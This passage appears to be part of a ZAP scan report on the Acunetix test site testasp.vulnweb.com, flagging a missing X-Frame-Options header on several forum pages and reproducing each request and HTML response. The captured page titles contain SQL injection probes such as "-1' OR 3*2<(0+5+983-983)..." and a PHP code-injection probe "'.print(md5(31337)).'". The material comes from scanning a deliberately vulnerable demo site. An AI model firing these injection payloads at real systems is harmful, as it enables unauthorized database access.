InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4133 |
Response Body - size: 4,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>5559996333</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4243 |
Response Body - size: 4,243 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4179 |
Response Body - size: 4,179 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum '.print(md5(31337)).' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/'.print(md5(31337)).' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>'.print(md5(31337)).' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4243 |
Response Body - size: 4,243 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=41 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4237 |
Response Body - size: 4,237 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=42 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4237 |
Response Body - size: 4,237 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=43 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 2+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 2+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 2+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 